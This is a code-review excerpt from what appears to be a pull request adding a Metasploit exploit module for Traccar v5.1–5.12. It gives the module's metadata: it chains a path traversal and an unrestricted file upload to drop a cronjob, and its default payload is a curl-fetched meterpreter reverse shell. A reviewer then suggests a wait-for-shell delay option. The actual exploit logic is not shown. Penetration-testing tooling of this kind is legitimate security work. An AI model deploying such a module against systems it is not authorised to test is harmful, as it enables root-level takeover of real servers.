modules/exploits/linux/http/traccar_rce_upload.rb

```diff
@@ -0,0 +1,262 @@
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Traccar v5 Remote Code Execution (CVE-2024-31214 and CVE-2024-24809)',
+        'Description' => %q{
+          Remote Code Execution in Traccar v5.1 - v5.12.
+          Remote code execution can be obtained by combining two vulnerabilities: A path traversal vulnerability (CVE-2024-24809) and an unrestricted file upload vulnerability (CVE-2024-31214).
+          By default, the application allows self-registration, enabling any user to register an account and exploit the issues. Moreover, the application runs by default with root privileges, potentially resulting in a complete system compromise.
+          This module, which should work on any Red Hat-based Linux system, exploits these issues by adding a new cronjob file that executes the specified payload.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Michael Heinzl', # MSF Module
+          'yiliufeng168', # Discovery CVE-2024-24809 and PoC
+          'Naveen Sunkavally' # Discovery CVE-2024-31214 and PoC
+        ],
+        'References' => [
+          [ 'URL', 'https://github.com/traccar/traccar/security/advisories/GHSA-vhrw-72f6-gwp5'],
+          [ 'URL', 'https://github.com/traccar/traccar/security/advisories/GHSA-3gxq-f2qj-c8v9'],
+          [ 'URL', 'https://www.horizon3.ai/attack-research/disclosures/traccar-5-remote-code-execution-vulnerabilities/'],
+          [ 'CVE', '2024-31214'],
+          [ 'CVE', '2024-24809']
+        ],
+        'DisclosureDate' => '2024-08-23',
+        'Platform' => [ 'linux' ],
+        'Arch' => [ ARCH_CMD ],
+        'Targets' => [
+          [
+            'Linux Command',
+            {
+              'Arch' => [ ARCH_CMD ],
+              'Platform' => [ 'linux' ],
+              'DefaultOptions' => {
+                'FETCH_COMMAND' => 'CURL',
+                'PAYLOAD' => 'cmd/linux/http/x64/meterpreter/reverse_tcp'
+
+              },
+              'Type' => :unix_cmd
+            }
+          ]
+        ],
```

Comment:
Regarding the Notes section of the description. Your suspicions of a more proper MSF way were correct - this Wait For Shell Delay can replace the `sleep(60)`.
```suggestion
        ],
        'DefaultOptions' => {
          'WfsDelay' => 75
        },
```

Reply:
That's another useful option that will come in handy for future modules, thank you.